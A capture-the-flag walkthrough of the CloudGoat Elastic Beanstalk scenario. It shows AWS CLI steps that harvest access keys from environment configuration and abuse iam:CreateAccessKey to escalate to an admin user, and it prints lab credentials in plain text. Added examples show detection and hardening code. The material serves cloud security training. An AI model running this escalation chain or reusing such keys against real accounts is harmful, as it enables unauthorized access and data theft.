CloudGoat: Beanstalk Secrets Walkthrough
AWS Elastic Beanstalk
Elastic Beanstalk is AWS’s Platform-as-a-Service (PaaS) for web applications and services. You deploy code, and it handles the heavy lifting of capacity provisioning, load balancing, auto-scaling, application health monitoring and updates.
- Automated Infrastructure
  - Provisions EC2 instances, Load Balancers, and Auto Scaling Groups
  - Manages capacity, deployments (rolling, immutable, blue/green), health checks, and scaling rules
How it works
You simply upload your application code (Node.js, Python, Java, .NET, etc.), choose an execution platform, and Elastic Beanstalk orchestrates the underlying AWS resources. This streamlines deployments, abstracts away infrastructure complexity, and lets you focus squarely on your application logic.
Elastic Beanstalk Secret Exposure
- A common misconfiguration in Elastic Beanstalk is exposing sensitive data through environment variables or application source code.
- Developers often set environment properties such as:
  - Database connection strings
  - API keys
  - AWS credentials
- These values can be accessed by users with permissions to read the environment configuration.
- Application source code stored in S3 (as part of the Beanstalk deployment) might include:
  - Hardcoded secrets
  - API tokens
  - AWS access keys
- This issue isn’t exclusive to Beanstalk — it’s a common cloud security misstep.
- Best Practice: Always store secrets in AWS Secrets Manager, not in environment variables or embedded in code.
- Leaked secrets can lead to:
  - Privilege escalation
  - Data exposure
  - Lateral movement within the AWS account
- While Elastic Beanstalk abstracts infrastructure, securing configurations and sensitive data is the customer’s responsibility.
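To check your own environments for this misconfiguration, the following added example (not part of the original walkthrough) scans the JSON returned by describe-configuration-settings for environment properties that look like secrets. The sample input is constructed, and the comma-joined EnvironmentVariables option under aws:cloudformation:template:parameter is an assumption based on the grep output shown later on this page.

```python
import re

ENV_NS = "aws:elasticbeanstalk:application:environment"
NAME_HINT = re.compile(r"SECRET|PASSWORD|PASSWD|TOKEN|API_?KEY|ACCESS_KEY|PRIVATE_KEY", re.I)
ACCESS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")

# Constructed sample in the shape of describe-configuration-settings output.
# Names and values are placeholders; AKIAIOSFODNN7EXAMPLE is AWS's documentation key ID.
SAMPLE = {"ConfigurationSettings": [{
    "ApplicationName": "example-app",
    "EnvironmentName": "example-env",
    "OptionSettings": [
        {"Namespace": ENV_NS, "OptionName": "DB_PASSWORD", "Value": "constructed-value"},
        {"Namespace": ENV_NS, "OptionName": "PYTHONPATH", "Value": "/var/app/venv/bin"},
        {"Namespace": ENV_NS, "OptionName": "BACKUP_USER", "Value": "AKIAIOSFODNN7EXAMPLE"},
        # Assumed: the same properties repeated as one comma-joined K=V string.
        {"Namespace": "aws:cloudformation:template:parameter",
         "OptionName": "EnvironmentVariables",
         "Value": "DB_PASSWORD=constructed-value,PYTHONPATH=/var/app/venv/bin"},
    ],
}]}

def env_properties(settings):
    """Yield (name, value) for each environment property of one environment."""
    for opt in settings.get("OptionSettings", []):
        value = opt.get("Value") or ""
        if opt.get("Namespace") == ENV_NS:
            yield opt["OptionName"], value
        elif opt.get("OptionName") == "EnvironmentVariables":
            for pair in filter(None, value.split(",")):
                name, _, val = pair.partition("=")
                yield name, val

def find_exposed_secrets(response):
    """Return sorted (environment, property, reason) findings; values are never echoed."""
    findings = set()
    for settings in response.get("ConfigurationSettings", []):
        env = settings["EnvironmentName"]
        for name, value in env_properties(settings):
            if NAME_HINT.search(name):
                findings.add((env, name, "secret-like name"))
            elif ACCESS_KEY_ID.search(value):
                findings.add((env, name, "value looks like an AWS access key ID"))
    return sorted(findings)

if __name__ == "__main__":
    for finding in find_exposed_secrets(SAMPLE):
        print(*finding, sep=" | ")
```

Any property it reports is a candidate for moving into AWS Secrets Manager and rotating.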
Initial Access
Credentials
Access Key: AKIA2K3L7SQOUGEKVP4I
Secret Key: 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
- The user has access to the Elastic Beanstalk service
Enumeration
Run the following command to log in as beanstalk:
aws configure --profile beanstalk
AWS Access Key ID [None]: AKIAxxxxxxxxxxxxxxx
AWS Secret Access Key [None]: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Default region name [None]: us-east-1 # or your preferred region
Default output format [None]: json # or 'text' or 'table'
Verify the access
└─$ aws sts get-caller-identity --profile beanstalk
{
"UserId": "AIDA2K3L7SQOZFHAQ7TEN",
"Account": "710506681373",
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_low_priv_user"
}
Found an application hosted on Elastic Beanstalk
└─$ aws elasticbeanstalk describe-applications --query "Applications[*].{Name:ApplicationName,Versions:VersionLabels}" --output table --profile beanstalk
------------------------------------
| DescribeApplications |
+---------------------+------------+
| Name | Versions |
+---------------------+------------+
| cgidtkpw8slyli-app | None |
+---------------------+------------+
Discovered an Elastic Beanstalk environment
└─$ aws elasticbeanstalk describe-environments --query "Environments[*].{App:ApplicationName,Env:EnvironmentName,Status:Status,URL:CNAME}" --output table --profile beanstalk
--------------------------------------------------------------------------------------------------------------------------
| DescribeEnvironments |
+--------------------+---------------------+---------+-------------------------------------------------------------------+
| App | Env | Status | URL |
+--------------------+---------------------+---------+-------------------------------------------------------------------+
| cgidtkpw8slyli-app| cgidtkpw8slyli-env | Ready | cgidtkpw8slyli-env.eba-iftrmxpw.us-east-1.elasticbeanstalk.com |
+--------------------+---------------------+---------+-------------------------------------------------------------------+
Accessing the Application via the Web

The environment runs a Python application that is accessible through the web.
Found credentials in the application’s configuration
aws elasticbeanstalk describe-configuration-settings --application-name cgidtkpw8slyli-app --environment-name cgidtkpw8slyli-env --output yaml --profile beanstalk | grep -E '(ACCESS|SECRET)_KEY'
Value: SECONDARY_SECRET_KEY=XtrLABjEhyT6I2NUlneNDE9YBeMafgzfAxveSQCZ,PYTHONPATH=/var/app/venv/staging-LQM1lest/bin,SECONDARY_ACCESS_KEY=AKIA2K3L7SQOVXOHGYFM
Since the output was large, I used grep to extract the access key and secret key.
Whoami for the Discovered Credentials
Run the following command to log in as secondary_creds:
aws configure --profile secondary_creds
AWS Access Key ID [None]: AKIAxxxxxxxxxxxxxxx
AWS Secret Access Key [None]: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Default region name [None]: us-east-1 # or your preferred region
Default output format [None]: json # or 'text' or 'table'
Verify the access
└─$ aws sts get-caller-identity --profile secondary_creds
{
"UserId": "AIDA2K3L7SQOYHBOFYMWJ",
"Account": "710506681373",
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_secondary_user"
}
Users Found
{
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_admin_user",
"CreateDate": "Fri, 20 Jun 2025 06:49:17",
"Path": "/",
"UserId": "AIDA2K3L7SQO4LQ4YK4LF",
"UserName": "cgidtkpw8slyli_admin_user"
},
{
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_low_priv_user",
"CreateDate": "Fri, 20 Jun 2025 06:49:17",
"Path": "/",
"UserId": "AIDA2K3L7SQOZFHAQ7TEN",
"UserName": "cgidtkpw8slyli_low_priv_user"
},
{
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_secondary_user",
"CreateDate": "Fri, 20 Jun 2025 06:49:17",
"Path": "/",
"UserId": "AIDA2K3L7SQOYHBOFYMWJ",
"UserName": "cgidtkpw8slyli_secondary_user"
}
Let’s check the policies to see whether we can escalate from the secondary user to the admin user.
Policies attached to the User
└─$ aws iam list-attached-user-policies --user-name cgidtkpw8slyli_secondary_user --profile secondary_creds
{
"AttachedPolicies": [
{
"PolicyName": "cgidtkpw8slyli_secondary_policy",
"PolicyArn": "arn:aws:iam::710506681373:policy/cgidtkpw8slyli_secondary_policy"
}
]
}
Roles found apart from AWS service role
{
"Path": "/",
"RoleName": "cgidtkpw8slyli_eb_instance_role",
"RoleId": "AROA2K3L7SQOQH7CHRWJM",
"Arn": "arn:aws:iam::710506681373:role/cgidtkpw8slyli_eb_instance_role",
"CreateDate": "2025-06-20T06:49:17+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/",
"RoleName": "cgidtkpw8slyli_eb_service_role",
"RoleId": "AROA2K3L7SQOXT44YKHLR",
"Arn": "arn:aws:iam::710506681373:role/cgidtkpw8slyli_eb_service_role",
"CreateDate": "2025-06-20T06:49:17+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "elasticbeanstalk.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
Nothing interesting here
Secondary user permissions
└─$ aws iam get-policy-version --policy-arn arn:aws:iam::710506681373:policy/cgidtkpw8slyli_secondary_policy --version-id v1 --profile secondary_creds
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"iam:CreateAccessKey"
],
"Effect": "Allow",
"Resource": "*"
},
{
"Action": [
"iam:ListRoles",
"iam:GetRole",
"iam:ListPolicies",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetPolicyVersion",
"iam:ListUsers",
"iam:GetUser",
"iam:ListGroups",
"iam:GetGroup",
"iam:ListAttachedUserPolicies",
"iam:ListAttachedRolePolicies",
"iam:GetRolePolicy"
],
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2025-06-20T06:49:17+00:00"
}
}
The user has permission to create access keys. We can check whether it’s possible to create a new access key for the discovered admin user.
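The weakness in this policy is that iam:CreateAccessKey is allowed on Resource "*". As an added example (not part of the original walkthrough), this check flags such statements and shows the policy beside a corrected form that scopes key creation to the caller's own user; the function name and the abbreviated read-only statement are choices made for this example.

```python
from fnmatch import fnmatchcase

def _as_list(value):
    return value if isinstance(value, list) else [value]

def risky_create_access_key(policy_document):
    """Return indexes of Allow statements that permit iam:CreateAccessKey on
    anything other than the caller's own user. NotAction, NotResource and
    Condition are out of scope here."""
    risky = []
    for index, stmt in enumerate(_as_list(policy_document.get("Statement", []))):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            continue
        # IAM action names are case-insensitive and may contain * wildcards.
        grants = any(fnmatchcase("iam:createaccesskey", action.lower())
                     for action in _as_list(stmt["Action"]))
        self_scoped = all(":user/" in res and res.endswith("/${aws:username}")
                          for res in _as_list(stmt.get("Resource", "*")))
        if grants and not self_scoped:
            risky.append(index)
    return risky

# The secondary user's policy as shown above (read-only actions abbreviated).
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Action": ["iam:CreateAccessKey"], "Effect": "Allow", "Resource": "*"},
        {"Action": ["iam:ListUsers", "iam:GetUser"], "Effect": "Allow", "Resource": "*"},
    ],
}

# Corrected form: key creation limited to the calling user's own identity.
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Action": ["iam:CreateAccessKey"], "Effect": "Allow",
         "Resource": "arn:aws:iam::*:user/${aws:username}"},
        {"Action": ["iam:ListUsers", "iam:GetUser"], "Effect": "Allow", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    print("weak policy, risky statements:", risky_create_access_key(WEAK_POLICY))
    print("hardened policy, risky statements:", risky_create_access_key(HARDENED_POLICY))
```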
Admin User Permission
└─$ aws iam get-policy-version --policy-arn arn:aws:iam::710506681373:policy/cgidtkpw8slyli_admin_user_policy --version-id v1 --profile secondary_creds
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": "*",
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2025-06-20T06:49:17+00:00"
}
}
Reviewing the attached IAM policy verifies that the admin_user, identified during earlier enumeration, has access to all resources.
Privilege Escalation
Abusing the CreateAccessKey permission assigned to the secondary user
└─$ aws iam create-access-key --user-name cgidtkpw8slyli_admin_user --profile secondary_creds --query "AccessKey.{ID:AccessKeyId,Secret:SecretAccessKey}" --output table
----------------------------------------------------------------------
| CreateAccessKey |
+-----------------------+--------------------------------------------+
| ID | Secret |
+-----------------------+--------------------------------------------+
| AKIA2K3L7SQOYAPTLBXW | dp5EQixZKxPp8efUd0ffduSjmmeuccgOCLrUWfrr |
+-----------------------+--------------------------------------------+
Used the CreateAccessKey permission to generate a new access key and secret for the admin user, successfully escalating privileges.
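This step leaves a clear trace in CloudTrail: a CreateAccessKey event whose target user differs from the caller. The following detection is an added example (not part of the original walkthrough); the log records are constructed, and it assumes requestParameters may be null when a user creates a key for themselves.

```python
import json

# Constructed CloudTrail records, one JSON object per line; all values are placeholders.
SAMPLE_LOG = "\n".join(json.dumps(event) for event in [
    {"eventTime": "2025-01-01T10:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "dev_user"},
     "requestParameters": None},
    {"eventTime": "2025-01-01T10:05:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "ListUsers", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"type": "IAMUser", "userName": "app_user"},
     "requestParameters": None},
    {"eventTime": "2025-01-01T10:06:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"type": "IAMUser", "userName": "app_user"},
     "requestParameters": {"userName": "admin_user"}},
    {"eventTime": "2025-01-01T10:07:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"type": "IAMUser", "userName": "app_user"},
     "requestParameters": {"userName": "ops_user"}, "errorCode": "AccessDenied"},
])

def cross_user_key_creations(log_text):
    """Return one finding per CreateAccessKey call whose target user is not the caller."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if (event.get("eventSource"), event.get("eventName")) != ("iam.amazonaws.com", "CreateAccessKey"):
            continue
        identity = event.get("userIdentity") or {}
        # Role sessions carry no userName, so fall back to the caller ARN.
        caller = identity.get("userName") or identity.get("arn", "unknown")
        # No userName in the request means the key is for the caller.
        target = (event.get("requestParameters") or {}).get("userName") or caller
        if target != caller:
            findings.append({"time": event.get("eventTime"), "caller": caller,
                             "target": target, "source_ip": event.get("sourceIPAddress"),
                             "outcome": event.get("errorCode", "Success")})
    return findings

if __name__ == "__main__":
    for finding in cross_user_key_creations(SAMPLE_LOG):
        print(finding)
```

Denied attempts are reported as well, since a failed cross-user CreateAccessKey call is still a sign that someone is probing for this path.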
Login as admin_user
Run the following command to log in as admin_user:
aws configure --profile admin_user
AWS Access Key ID [None]: AKIAxxxxxxxxxxxxxxx
AWS Secret Access Key [None]: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Default region name [None]: us-east-1 # or your preferred region
Default output format [None]: json # or 'text' or 'table'
Verify the access
└─$ aws sts get-caller-identity --profile admin_user
{
"UserId": "AIDA2K3L7SQO4LQ4YK4LF",
"Account": "710506681373",
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_admin_user"
}
Flag Enumeration
Enumerating secrets stored in AWS Secrets Manager
└─$ aws secretsmanager list-secrets --profile admin_user
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:710506681373:secret:cgidtkpw8slyli_final_flag-MMZqVO",
"Name": "cgidtkpw8slyli_final_flag",
"LastChangedDate": "2025-06-20T12:19:18.324000+05:30",
"LastAccessedDate": "2025-06-20T05:30:00+05:30",
"Tags": [
{
"Key": "Scenario",
"Value": "beanstalk_secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
],
"SecretVersionsToStages": {
"terraform-20250620064917990300000002": [
"AWSCURRENT"
]
},
"CreatedDate": "2025-06-20T12:19:16.824000+05:30"
}
]
}
Value to be used to fetch the secret:
secrets-id=cgidtkpw8slyli_final_flag-MMZqVO
└─$ aws secretsmanager get-secret-value --secret-id cgidtkpw8slyli_final_flag --profile admin_user
{
"ARN": "arn:aws:secretsmanager:us-east-1:710506681373:secret:cgidtkpw8slyli_final_flag-MMZqVO",
"Name": "cgidtkpw8slyli_final_flag",
"VersionId": "terraform-20250620064917990300000002",
"SecretString": "FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2025-06-20T12:19:18.320000+05:30"
}
Secret Found: FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}